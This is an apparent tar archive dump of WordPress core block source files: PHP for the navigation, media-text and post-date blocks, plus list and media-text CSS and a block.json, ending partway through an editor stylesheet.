		$rel              = ( null !== $menu_item->xfn && '' !== $menu_item->xfn ) ? $menu_item->xfn : null;
		$kind             = null !== $menu_item->type ? str_replace( '_', '-', $menu_item->type ) : 'custom';

		$block = array(
			'blockName' => isset( $menu_items_by_parent_id[ $menu_item->ID ] ) ? 'core/navigation-submenu' : 'core/navigation-link',
			'attrs'     => array(
				'className'     => $class_name,
				'description'   => $menu_item->description,
				'id'            => $id,
				'kind'          => $kind,
				'label'         => $menu_item->title,
				'opensInNewTab' => $opens_in_new_tab,
				'rel'           => $rel,
				'title'         => $menu_item->attr_title,
				'type'          => $menu_item->object,
				'url'           => $menu_item->url,
			),
		);

		$block['innerBlocks']  = isset( $menu_items_by_parent_id[ $menu_item->ID ] )
			? block_core_navigation_parse_blocks_from_menu_items( $menu_items_by_parent_id[ $menu_item->ID ], $menu_items_by_parent_id )
			: array();
		$block['innerContent'] = array_map( 'serialize_block', $block['innerBlocks'] );

		$blocks[] = $block;
	}

	return $blocks;
}

/**
 * Get the classic navigation menu to use as a fallback.
 *
 * @since 6.2.0
 *
 * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_classic_menu_fallback() instead.
 *
 * @return object WP_Term The classic navigation.
 */
function block_core_navigation_get_classic_menu_fallback() {

	_deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_classic_menu_fallback' );

	$classic_nav_menus = wp_get_nav_menus();

	// If menus exist.
	if ( $classic_nav_menus && ! is_wp_error( $classic_nav_menus ) ) {
		// Handles simple use case where user has a classic menu and switches to a block theme.

		// Returns the menu assigned to location `primary`.
		$locations = get_nav_menu_locations();
		if ( isset( $locations['primary'] ) ) {
			$primary_menu = wp_get_nav_menu_object( $locations['primary'] );
			if ( $primary_menu ) {
				return $primary_menu;
			}
		}

		// Returns a menu if `primary` is its slug.
		foreach ( $classic_nav_menus as $classic_nav_menu ) {
			if ( 'primary' === $classic_nav_menu->slug ) {
				return $classic_nav_menu;
			}
		}

		// Otherwise return the most recently created classic menu.
		usort(
			$classic_nav_menus,
			static function ( $a, $b ) {
				return $b->term_id - $a->term_id;
			}
		);
		return $classic_nav_menus[0];
	}
}

/**
 * Converts a classic navigation to blocks.
 *
 * @since 6.2.0
 *
 * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_classic_menu_fallback_blocks() instead.
 *
 * @param  object $classic_nav_menu WP_Term The classic navigation object to convert.
 * @return array the normalized parsed blocks.
 */
function block_core_navigation_get_classic_menu_fallback_blocks( $classic_nav_menu ) {

	_deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_classic_menu_fallback_blocks' );

	// BEGIN: Code that already exists in wp_nav_menu().
	$menu_items = wp_get_nav_menu_items( $classic_nav_menu->term_id, array( 'update_post_term_cache' => false ) );

	// Set up the $menu_item variables.
	_wp_menu_item_classes_by_context( $menu_items );

	$sorted_menu_items = array();
	foreach ( (array) $menu_items as $menu_item ) {
		$sorted_menu_items[ $menu_item->menu_order ] = $menu_item;
	}

	unset( $menu_items, $menu_item );

	// END: Code that already exists in wp_nav_menu().

	$menu_items_by_parent_id = array();
	foreach ( $sorted_menu_items as $menu_item ) {
		$menu_items_by_parent_id[ $menu_item->menu_item_parent ][] = $menu_item;
	}

	$inner_blocks = block_core_navigation_parse_blocks_from_menu_items(
		isset( $menu_items_by_parent_id[0] )
			? $menu_items_by_parent_id[0]
			: array(),
		$menu_items_by_parent_id
	);

	return serialize_blocks( $inner_blocks );
}

/**
 * If there's a classic menu then use it as a fallback.
 *
 * @since 6.2.0
 *
 * @deprecated 6.3.0 Use WP_Navigation_Fallback::create_classic_menu_fallback() instead.
 *
 * @return array the normalized parsed blocks.
 */
function block_core_navigation_maybe_use_classic_menu_fallback() {

	_deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::create_classic_menu_fallback' );

	// See if we have a classic menu.
	$classic_nav_menu = block_core_navigation_get_classic_menu_fallback();

	if ( ! $classic_nav_menu ) {
		return;
	}

	// If we have a classic menu then convert it to blocks.
	$classic_nav_menu_blocks = block_core_navigation_get_classic_menu_fallback_blocks( $classic_nav_menu );

	if ( empty( $classic_nav_menu_blocks ) ) {
		return;
	}

	// Create a new navigation menu from the classic menu.
	$wp_insert_post_result = wp_insert_post(
		array(
			'post_content' => $classic_nav_menu_blocks,
			'post_title'   => $classic_nav_menu->name,
			'post_name'    => $classic_nav_menu->slug,
			'post_status'  => 'publish',
			'post_type'    => 'wp_navigation',
		),
		true // So that we can check whether the result is an error.
	);

	if ( is_wp_error( $wp_insert_post_result ) ) {
		return;
	}

	// Fetch the most recently published navigation which will be the classic one created above.
	return block_core_navigation_get_most_recently_published_navigation();
}

/**
 * Finds the most recently published `wp_navigation` Post.
 *
 * @since 6.1.0
 *
 * @deprecated 6.3.0 Use WP_Navigation_Fallback::get_most_recently_published_navigation() instead.
 *
 * @return WP_Post|null the first non-empty Navigation or null.
 */
function block_core_navigation_get_most_recently_published_navigation() {

	_deprecated_function( __FUNCTION__, '6.3.0', 'WP_Navigation_Fallback::get_most_recently_published_navigation' );

	// Default to the most recently created menu.
	$parsed_args = array(
		'post_type'              => 'wp_navigation',
		'no_found_rows'          => true,
		'update_post_meta_cache' => false,
		'update_post_term_cache' => false,
		'order'                  => 'DESC',
		'orderby'                => 'date',
		'post_status'            => 'publish',
		'posts_per_page'         => 1, // get only the most recent.
	);

	$navigation_post = new WP_Query( $parsed_args );
	if ( count( $navigation_post->posts ) > 0 ) {
		return $navigation_post->posts[0];
	}

	return null;
}

/**
 * Accepts the serialized markup of a block and its inner blocks, and returns serialized markup of the inner blocks.
 *
 * @since 6.5.0
 *
 * @param string $serialized_block The serialized markup of a block and its inner blocks.
 * @return string
 */
function block_core_navigation_remove_serialized_parent_block( $serialized_block ) {
	$start = strpos( $serialized_block, '-->' ) + strlen( '-->' );
	$end   = strrpos( $serialized_block, '<!--' );
	return substr( $serialized_block, $start, $end - $start );
}

/**
 * Mock a parsed block for the Navigation block given its inner blocks and the `wp_navigation` post object.
 * The `wp_navigation` post's `_wp_ignored_hooked_blocks` meta is queried to add the `metadata.ignoredHookedBlocks` attribute.
 *
 * @since 6.5.0
 *
 * @param array   $inner_blocks Parsed inner blocks of a Navigation block.
 * @param WP_Post $post         `wp_navigation` post object corresponding to the block.
 *
 * @return array the normalized parsed blocks.
 */
function block_core_navigation_mock_parsed_block( $inner_blocks, $post ) {
	$attributes = array();

	if ( isset( $post->ID ) ) {
		$ignored_hooked_blocks = get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true );
		if ( ! empty( $ignored_hooked_blocks ) ) {
			$ignored_hooked_blocks  = json_decode( $ignored_hooked_blocks, true );
			$attributes['metadata'] = array(
				'ignoredHookedBlocks' => $ignored_hooked_blocks,
			);
		}
	}

	$mock_anchor_parent_block = array(
		'blockName'    => 'core/navigation',
		'attrs'        => $attributes,
		'innerBlocks'  => $inner_blocks,
		'innerContent' => array_fill( 0, count( $inner_blocks ), null ),
	);

	return $mock_anchor_parent_block;
}

/**
 * Insert hooked blocks into a Navigation block.
 *
 * Given a Navigation block's inner blocks and its corresponding `wp_navigation` post object,
 * this function inserts hooked blocks into it, and returns the serialized inner blocks in a
 * mock Navigation block wrapper.
 *
 * If there are any hooked blocks that need to be inserted as the Navigation block's first or last
 * children, the `wp_navigation` post's `_wp_ignored_hooked_blocks` meta is checked to see if any
 * of those hooked blocks should be exempted from insertion.
 *
 * @since 6.5.0
 *
 * @param array   $inner_blocks Parsed inner blocks of a Navigation block.
 * @param WP_Post $post         `wp_navigation` post object corresponding to the block.
 * @return string Serialized inner blocks in mock Navigation block wrapper, with hooked blocks inserted, if any.
 */
function block_core_navigation_insert_hooked_blocks( $inner_blocks, $post ) {
	$mock_navigation_block = block_core_navigation_mock_parsed_block( $inner_blocks, $post );
	$hooked_blocks         = get_hooked_blocks();
	$before_block_visitor  = null;
	$after_block_visitor   = null;

	if ( ! empty( $hooked_blocks ) || has_filter( 'hooked_block_types' ) ) {
		$before_block_visitor = make_before_block_visitor( $hooked_blocks, $post, 'insert_hooked_blocks' );
		$after_block_visitor  = make_after_block_visitor( $hooked_blocks, $post, 'insert_hooked_blocks' );
	}

	return traverse_and_serialize_block( $mock_navigation_block, $before_block_visitor, $after_block_visitor );
}

/**
 * Insert ignoredHookedBlocks meta into the Navigation block and its inner blocks.
 *
 * Given a Navigation block's inner blocks and its corresponding `wp_navigation` post object,
 * this function inserts ignoredHookedBlocks meta into it, and returns the serialized inner blocks in a
 * mock Navigation block wrapper.
 *
 * @since 6.5.0
 *
 * @param array   $inner_blocks Parsed inner blocks of a Navigation block.
 * @param WP_Post $post         `wp_navigation` post object corresponding to the block.
 * @return string Serialized inner blocks in mock Navigation block wrapper, with hooked blocks inserted, if any.
 */
function block_core_navigation_set_ignored_hooked_blocks_metadata( $inner_blocks, $post ) {
	$mock_navigation_block = block_core_navigation_mock_parsed_block( $inner_blocks, $post );
	$hooked_blocks         = get_hooked_blocks();
	$before_block_visitor  = null;
	$after_block_visitor   = null;

	if ( ! empty( $hooked_blocks ) || has_filter( 'hooked_block_types' ) ) {
		$before_block_visitor = make_before_block_visitor( $hooked_blocks, $post, 'set_ignored_hooked_blocks_metadata' );
		$after_block_visitor  = make_after_block_visitor( $hooked_blocks, $post, 'set_ignored_hooked_blocks_metadata' );
	}

	return traverse_and_serialize_block( $mock_navigation_block, $before_block_visitor, $after_block_visitor );
}

/**
 * Updates the post meta with the list of ignored hooked blocks when the navigation is created or updated via the REST API.
 *
 * @access private
 * @since 6.5.0
 *
 * @param stdClass $post Post object.
 * @return stdClass The updated post object.
 */
function block_core_navigation_update_ignore_hooked_blocks_meta( $post ) {
	/*
	 * In this scenario the user has likely tried to create a navigation via the REST API.
	 * In which case we won't have a post ID to work with and store meta against.
	 */
	if ( empty( $post->ID ) ) {
		return $post;
	}

	/**
	 * Skip meta generation when consumers intentionally update specific Navigation fields
	 * and omit the content update.
	 */
	if ( ! isset( $post->post_content ) ) {
		return $post;
	}

	/*
	 * We run the Block Hooks mechanism to inject the `metadata.ignoredHookedBlocks` attribute into
	 * all anchor blocks. For the root level, we create a mock Navigation and extract them from there.
	 */
	$blocks = parse_blocks( $post->post_content );

	/*
	 * Block Hooks logic requires a `WP_Post` object (rather than the `stdClass` with the updates that
	 * we're getting from the `rest_pre_insert_wp_navigation` filter) as its second argument (to be
	 * used as context for hooked blocks insertion).
	 * We thus have to look it up from the DB,based on `$post->ID`.
	 */
	$markup = block_core_navigation_set_ignored_hooked_blocks_metadata( $blocks, get_post( $post->ID ) );

	$root_nav_block        = parse_blocks( $markup )[0];
	$ignored_hooked_blocks = isset( $root_nav_block['attrs']['metadata']['ignoredHookedBlocks'] )
		? $root_nav_block['attrs']['metadata']['ignoredHookedBlocks']
		: array();

	if ( ! empty( $ignored_hooked_blocks ) ) {
		$existing_ignored_hooked_blocks = get_post_meta( $post->ID, '_wp_ignored_hooked_blocks', true );
		if ( ! empty( $existing_ignored_hooked_blocks ) ) {
			$existing_ignored_hooked_blocks = json_decode( $existing_ignored_hooked_blocks, true );
			$ignored_hooked_blocks          = array_unique( array_merge( $ignored_hooked_blocks, $existing_ignored_hooked_blocks ) );
		}
		update_post_meta( $post->ID, '_wp_ignored_hooked_blocks', json_encode( $ignored_hooked_blocks ) );
	}

	$post->post_content = block_core_navigation_remove_serialized_parent_block( $markup );
	return $post;
}

/*
 * Before adding our filter, we verify if it's already added in Core.
 * However, during the build process, Gutenberg automatically prefixes our functions with "gutenberg_".
 * Therefore, we concatenate the Core's function name to circumvent this prefix for our check.
 */
$rest_insert_wp_navigation_core_callback = 'block_core_navigation_' . 'update_ignore_hooked_blocks_meta'; // phpcs:ignore Generic.Strings.UnnecessaryStringConcat.Found

/*
 * Do not add the `block_core_navigation_update_ignore_hooked_blocks_meta` filter in the following cases:
 * - If Core has added the `update_ignored_hooked_blocks_postmeta` filter already (WP >= 6.6);
 * - or if the `set_ignored_hooked_blocks_metadata` function is unavailable (which is required for the filter to work. It was introduced by WP 6.5 but is not present in Gutenberg's WP 6.5 compatibility layer);
 * - or if the `$rest_insert_wp_navigation_core_callback` filter has already been added.
 */
if (
	! has_filter( 'rest_pre_insert_wp_navigation', 'update_ignored_hooked_blocks_postmeta' ) &&
	function_exists( 'set_ignored_hooked_blocks_metadata' ) &&
	! has_filter( 'rest_pre_insert_wp_navigation', $rest_insert_wp_navigation_core_callback )
) {
	add_filter( 'rest_pre_insert_wp_navigation', 'block_core_navigation_update_ignore_hooked_blocks_meta' );
}

/*
 * Previous versions of Gutenberg were attaching the block_core_navigation_update_ignore_hooked_blocks_meta
 * function to the `rest_insert_wp_navigation` _action_ (rather than the `rest_pre_insert_wp_navigation` _filter_).
 * To avoid collisions, we need to remove the filter from that action if it's present.
 */
if ( has_filter( 'rest_insert_wp_navigation', $rest_insert_wp_navigation_core_callback ) ) {
	remove_filter( 'rest_insert_wp_navigation', $rest_insert_wp_navigation_core_callback );
}

/**
 * Hooks into the REST API response for the core/navigation block and adds the first and last inner blocks.
 *
 * @since 6.5.0
 *
 * @param WP_REST_Response $response The response object.
 * @param WP_Post          $post     Post object.
 * @return WP_REST_Response The response object.
 */
function block_core_navigation_insert_hooked_blocks_into_rest_response( $response, $post ) {
	if ( ! isset( $response->data['content']['raw'] ) || ! isset( $response->data['content']['rendered'] ) ) {
		return $response;
	}
	$parsed_blocks = parse_blocks( $response->data['content']['raw'] );
	$content       = block_core_navigation_insert_hooked_blocks( $parsed_blocks, $post );

	// Remove mock Navigation block wrapper.
	$content = block_core_navigation_remove_serialized_parent_block( $content );

	$response->data['content']['raw'] = $content;

	/** This filter is documented in wp-includes/post-template.php */
	$response->data['content']['rendered'] = apply_filters( 'the_content', $content );

	return $response;
}

/*
 *  Before adding our filter, we verify if it's already added in Core.
 * However, during the build process, Gutenberg automatically prefixes our functions with "gutenberg_".
 * Therefore, we concatenate the Core's function name to circumvent this prefix for our check.
 */
$rest_prepare_wp_navigation_core_callback = 'block_core_navigation_' . 'insert_hooked_blocks_into_rest_response';

/*
 * Do not add the `block_core_navigation_insert_hooked_blocks_into_rest_response` filter in the following cases:
 * - If Core has added the `insert_hooked_blocks_into_rest_response` filter already (WP >= 6.6);
 * - or if the `set_ignored_hooked_blocks_metadata` function is unavailable (which is required for the filter to work. It was introduced by WP 6.5 but is not present in Gutenberg's WP 6.5 compatibility layer);
 * - or if the `$rest_prepare_wp_navigation_core_callback` filter has already been added.
 */
if (
	! has_filter( 'rest_prepare_wp_navigation', 'insert_hooked_blocks_into_rest_response' ) &&
	function_exists( 'set_ignored_hooked_blocks_metadata' ) &&
	! has_filter( 'rest_prepare_wp_navigation', $rest_prepare_wp_navigation_core_callback )
) {
	add_filter( 'rest_prepare_wp_navigation', 'block_core_navigation_insert_hooked_blocks_into_rest_response', 10, 3 );
}
list/style.css000060400000000161151330427370007370 0ustar00ol,ul{
  box-sizing:border-box;
}

:root :where(ul.has-background,ol.has-background){
  padding:1.25em 2.375em;
}list/style-rtl.css000060400000000161151330427370010167 0ustar00ol,ul{
  box-sizing:border-box;
}

:root :where(ul.has-background,ol.has-background){
  padding:1.25em 2.375em;
}list/style-rtl.min.css000060400000000145151330427370010753 0ustar00ol,ul{box-sizing:border-box}:root :where(ul.has-background,ol.has-background){padding:1.25em 2.375em}list/block.json000060400000003321151330427370007504 0ustar00{
	"$schema": "https://schemas.wp.org/trunk/block.json",
	"apiVersion": 3,
	"name": "core/list",
	"title": "List",
	"category": "text",
	"allowedBlocks": [ "core/list-item" ],
	"description": "Create a bulleted or numbered list.",
	"keywords": [ "bullet list", "ordered list", "numbered list" ],
	"textdomain": "default",
	"attributes": {
		"ordered": {
			"type": "boolean",
			"default": false,
			"__experimentalRole": "content"
		},
		"values": {
			"type": "string",
			"source": "html",
			"selector": "ol,ul",
			"multiline": "li",
			"__unstableMultilineWrapperTags": [ "ol", "ul" ],
			"default": "",
			"__experimentalRole": "content"
		},
		"type": {
			"type": "string"
		},
		"start": {
			"type": "number"
		},
		"reversed": {
			"type": "boolean"
		},
		"placeholder": {
			"type": "string"
		}
	},
	"supports": {
		"anchor": true,
		"html": false,
		"typography": {
			"fontSize": true,
			"lineHeight": true,
			"__experimentalFontFamily": true,
			"__experimentalFontWeight": true,
			"__experimentalFontStyle": true,
			"__experimentalTextTransform": true,
			"__experimentalTextDecoration": true,
			"__experimentalLetterSpacing": true,
			"__experimentalDefaultControls": {
				"fontSize": true
			}
		},
		"color": {
			"gradients": true,
			"link": true,
			"__experimentalDefaultControls": {
				"background": true,
				"text": true
			}
		},
		"spacing": {
			"margin": true,
			"padding": true,
			"__experimentalDefaultControls": {
				"margin": false,
				"padding": false
			}
		},
		"__unstablePasteTextInline": true,
		"__experimentalOnMerge": true,
		"__experimentalSlashInserter": true,
		"interactivity": {
			"clientNavigation": true
		}
	},
	"editorStyle": "wp-block-list-editor",
	"style": "wp-block-list"
}
list/style.min.css000060400000000145151330427370010154 0ustar00ol,ul{box-sizing:border-box}:root :where(ul.has-background,ol.has-background){padding:1.25em 2.375em}media-text.php000060400000010243151330427370007317 0ustar00<?php
/**
 * Server-side rendering of the `core/media-text` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/media-text` block on server.
 *
 * @since 6.6.0
 *
 * @param array  $attributes The block attributes.
 * @param string $content    The block rendered content.
 *
 * @return string Returns the Media & Text block markup, if useFeaturedImage is true.
 */
function render_block_core_media_text( $attributes, $content ) {
	if ( false === $attributes['useFeaturedImage'] ) {
		return $content;
	}

	if ( in_the_loop() ) {
		update_post_thumbnail_cache();
	}

	$current_featured_image = get_the_post_thumbnail_url();
	if ( ! $current_featured_image ) {
		return $content;
	}

	$media_tag_processor   = new WP_HTML_Tag_Processor( $content );
	$wrapping_figure_query = array(
		'tag_name'   => 'figure',
		'class_name' => 'wp-block-media-text__media',
	);
	$has_media_on_right    = isset( $attributes['mediaPosition'] ) && 'right' === $attributes['mediaPosition'];
	$image_fill            = isset( $attributes['imageFill'] ) && $attributes['imageFill'];
	$focal_point           = isset( $attributes['focalPoint'] ) ? round( $attributes['focalPoint']['x'] * 100 ) . '% ' . round( $attributes['focalPoint']['y'] * 100 ) . '%' : '50% 50%';
	$unique_id             = 'wp-block-media-text__media-' . wp_unique_id();

	if ( $has_media_on_right ) {
		// Loop through all the figure tags and set a bookmark on the last figure tag.
		while ( $media_tag_processor->next_tag( $wrapping_figure_query ) ) {
			$media_tag_processor->set_bookmark( 'last_figure' );
		}
		if ( $media_tag_processor->has_bookmark( 'last_figure' ) ) {
			$media_tag_processor->seek( 'last_figure' );
			if ( $image_fill ) {
				$media_tag_processor->set_attribute( 'style', 'background-image:url(' . esc_url( $current_featured_image ) . ');background-position:' . $focal_point . ';' );
			} else {
				// Insert a unique ID to identify the figure tag.
				$media_tag_processor->set_attribute( 'id', $unique_id );
			}
		}
	} else {
		if ( $media_tag_processor->next_tag( $wrapping_figure_query ) ) {
			if ( $image_fill ) {
				$media_tag_processor->set_attribute( 'style', 'background-image:url(' . esc_url( $current_featured_image ) . ');background-position:' . $focal_point . ';' );
			} else {
				// Insert a unique ID to identify the figure tag.
				$media_tag_processor->set_attribute( 'id', $unique_id );
			}
		}
	}

	$content = $media_tag_processor->get_updated_html();

	// If the image is not set to fill, add the image tag inside the figure tag,
	// and update the image attributes in order to display the featured image.
	if ( ! $image_fill ) {
		$media_size_slug = isset( $attributes['mediaSizeSlug'] ) ? $attributes['mediaSizeSlug'] : 'full';
		$image_tag       = '<img class="wp-block-media-text__featured_image">';
		$content         = preg_replace(
			'/(<figure\s+id="' . preg_quote( $unique_id, '/' ) . '"\s+class="wp-block-media-text__media"\s*>)/',
			'$1' . $image_tag,
			$content
		);

		$image_tag_processor = new WP_HTML_Tag_Processor( $content );
		if ( $image_tag_processor->next_tag(
			array(
				'tag_name' => 'figure',
				'id'       => $unique_id,
			)
		) ) {
			// The ID is only used to ensure that the correct figure tag is selected,
			// and can now be removed.
			$image_tag_processor->remove_attribute( 'id' );
			if ( $image_tag_processor->next_tag(
				array(
					'tag_name'   => 'img',
					'class_name' => 'wp-block-media-text__featured_image',
				)
			) ) {
				$image_tag_processor->set_attribute( 'src', esc_url( $current_featured_image ) );
				$image_tag_processor->set_attribute( 'class', 'wp-image-' . get_post_thumbnail_id() . ' size-' . $media_size_slug );
				$image_tag_processor->set_attribute( 'alt', trim( strip_tags( get_post_meta( get_post_thumbnail_id(), '_wp_attachment_image_alt', true ) ) ) );

				$content = $image_tag_processor->get_updated_html();
			}
		}
	}

	return $content;
}

/**
 * Registers the `core/media-text` block renderer on server.
 *
 * @since 6.6.0
 */
function register_block_core_media_text() {
	register_block_type_from_metadata(
		__DIR__ . '/media-text',
		array(
			'render_callback' => 'render_block_core_media_text',
		)
	);
}
add_action( 'init', 'register_block_core_media_text' );
post-date.php000060400000004516151330427370007164 0ustar00<?php
/**
 * Server-side rendering of the `core/post-date` block.
 *
 * @package WordPress
 */

/**
 * Renders the `core/post-date` block on the server.
 *
 * @since 5.8.0
 *
 * @param array    $attributes Block attributes.
 * @param string   $content    Block default content.
 * @param WP_Block $block      Block instance.
 * @return string Returns the filtered post date for the current post wrapped inside "time" tags.
 */
function render_block_core_post_date( $attributes, $content, $block ) {
	if ( ! isset( $block->context['postId'] ) ) {
		return '';
	}

	$post_ID          = $block->context['postId'];
	$formatted_date   = get_the_date( empty( $attributes['format'] ) ? '' : $attributes['format'], $post_ID );
	$unformatted_date = esc_attr( get_the_date( 'c', $post_ID ) );
	$classes          = array();

	if ( isset( $attributes['textAlign'] ) ) {
		$classes[] = 'has-text-align-' . $attributes['textAlign'];
	}
	if ( isset( $attributes['style']['elements']['link']['color']['text'] ) ) {
		$classes[] = 'has-link-color';
	}

	/*
	 * If the "Display last modified date" setting is enabled,
	 * only display the modified date if it is later than the publishing date.
	 */
	if ( isset( $attributes['displayType'] ) && 'modified' === $attributes['displayType'] ) {
		if ( get_the_modified_date( 'Ymdhi', $post_ID ) > get_the_date( 'Ymdhi', $post_ID ) ) {
			$formatted_date   = get_the_modified_date( empty( $attributes['format'] ) ? '' : $attributes['format'], $post_ID );
			$unformatted_date = esc_attr( get_the_modified_date( 'c', $post_ID ) );
			$classes[]        = 'wp-block-post-date__modified-date';
		} else {
			return '';
		}
	}

	$wrapper_attributes = get_block_wrapper_attributes( array( 'class' => implode( ' ', $classes ) ) );

	if ( isset( $attributes['isLink'] ) && $attributes['isLink'] ) {
		$formatted_date = sprintf( '<a href="%1s">%2s</a>', get_the_permalink( $post_ID ), $formatted_date );
	}

	return sprintf(
		'<div %1$s><time datetime="%2$s">%3$s</time></div>',
		$wrapper_attributes,
		$unformatted_date,
		$formatted_date
	);
}

/**
 * Registers the `core/post-date` block on the server.
 *
 * @since 5.8.0
 */
function register_block_core_post_date() {
	register_block_type_from_metadata(
		__DIR__ . '/post-date',
		array(
			'render_callback' => 'render_block_core_post_date',
		)
	);
}
add_action( 'init', 'register_block_core_post_date' );
media-text/style.min.css000060400000004313151330427370011243 0ustar00.wp-block-media-text{box-sizing:border-box;
  /*!rtl:begin:ignore*/direction:ltr;
  /*!rtl:end:ignore*/display:grid;grid-template-columns:50% 1fr;grid-template-rows:auto}.wp-block-media-text.has-media-on-the-right{grid-template-columns:1fr 50%}.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{align-self:start}.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{align-self:center}.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{align-self:end}.wp-block-media-text>.wp-block-media-text__media{
  /*!rtl:begin:ignore*/grid-column:1;grid-row:1;
  /*!rtl:end:ignore*/margin:0}.wp-block-media-text>.wp-block-media-text__content{direction:ltr;
  /*!rtl:begin:ignore*/grid-column:2;grid-row:1;
  /*!rtl:end:ignore*/padding:0 8%;word-break:break-word}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{
  /*!rtl:begin:ignore*/grid-column:2;grid-row:1
  /*!rtl:end:ignore*/}.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{
  /*!rtl:begin:ignore*/grid-column:1;grid-row:1
  /*!rtl:end:ignore*/}.wp-block-media-text__media img,.wp-block-media-text__media video{height:auto;max-width:unset;vertical-align:middle;width:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media{background-size:cover;height:100%;min-height:250px}.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{display:block;height:100%}.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{height:1px;margin:-1px;overflow:hidden;padding:0;position:absolute;width:1px;clip:rect(0,0,0,0);border:0}@media (max-width:600px){.wp-block-media-text.is-stacked-on-mobile{grid-template-columns:100%!important}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{grid-column:1;grid-row:1}.wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{grid-column:1;grid-row:2}}media-text/style.css000060400000004274151330427370010467 0ustar00.wp-block-media-text{
  box-sizing:border-box;
  direction:ltr;
  display:grid;
  grid-template-columns:50% 1fr;
  grid-template-rows:auto;
}
.wp-block-media-text.has-media-on-the-right{
  grid-template-columns:1fr 50%;
}

.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-top>.wp-block-media-text__media{
  align-self:start;
}

.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-center>.wp-block-media-text__media,.wp-block-media-text>.wp-block-media-text__content,.wp-block-media-text>.wp-block-media-text__media{
  align-self:center;
}

.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__content,.wp-block-media-text.is-vertically-aligned-bottom>.wp-block-media-text__media{
  align-self:end;
}

.wp-block-media-text>.wp-block-media-text__media{
  grid-column:1;
  grid-row:1;
  margin:0;
}

.wp-block-media-text>.wp-block-media-text__content{
  direction:ltr;
  grid-column:2;
  grid-row:1;
  padding:0 8%;
  word-break:break-word;
}

.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__media{
  grid-column:2;
  grid-row:1;
}

.wp-block-media-text.has-media-on-the-right>.wp-block-media-text__content{
  grid-column:1;
  grid-row:1;
}

.wp-block-media-text__media img,.wp-block-media-text__media video{
  height:auto;
  max-width:unset;
  vertical-align:middle;
  width:100%;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media{
  background-size:cover;
  height:100%;
  min-height:250px;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media>a{
  display:block;
  height:100%;
}

.wp-block-media-text.is-image-fill>.wp-block-media-text__media img{
  height:1px;
  margin:-1px;
  overflow:hidden;
  padding:0;
  position:absolute;
  width:1px;
  clip:rect(0, 0, 0, 0);
  border:0;
}
@media (max-width:600px){
  .wp-block-media-text.is-stacked-on-mobile{
    grid-template-columns:100% !important;
  }
  .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__media{
    grid-column:1;
    grid-row:1;
  }
  .wp-block-media-text.is-stacked-on-mobile>.wp-block-media-text__content{
    grid-column:1;
    grid-row:2;
  }
}media-text/editor-rtl.css000060400000001373151330427370011411 0ustar00.wp-block-media-text__media{
  position:relative;
}
.wp-block-media-text__media.is-transient img{
  opacity:.3;
}
.wp-block-media-text__media .components-spinner{
  margin-right:-9px;
  margin-top:-9px;
  position:absolute;
  right:50%;
  top:50%;
}

.wp-block-media-text .__resizable_base__{
  grid-column:1 / span 2;
  grid-row:2;
}

.wp-block-media-text .editor-media-container__resizer{
  width:100% !important;
}

.wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer{
  height:100% !important;
}

.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{
  max-width:unset;
}
.wp-block-media-text--placeholder-image{
  min-height:205px;
}media-text/editor.css000060400000001371151330427370010610 0ustar00.wp-block-media-text__media{
  position:relative;
}
.wp-block-media-text__media.is-transient img{
  opacity:.3;
}
.wp-block-media-text__media .components-spinner{
  left:50%;
  margin-left:-9px;
  margin-top:-9px;
  position:absolute;
  top:50%;
}

.wp-block-media-text .__resizable_base__{
  grid-column:1 / span 2;
  grid-row:2;
}

.wp-block-media-text .editor-media-container__resizer{
  width:100% !important;
}

.wp-block-media-text.is-image-fill .components-placeholder.has-illustration,.wp-block-media-text.is-image-fill .editor-media-container__resizer{
  height:100% !important;
}

.wp-block-media-text>.block-editor-block-list__layout>.block-editor-block-list__block{
  max-width:unset;
}
.wp-block-media-text--placeholder-image{
  min-height:205px;
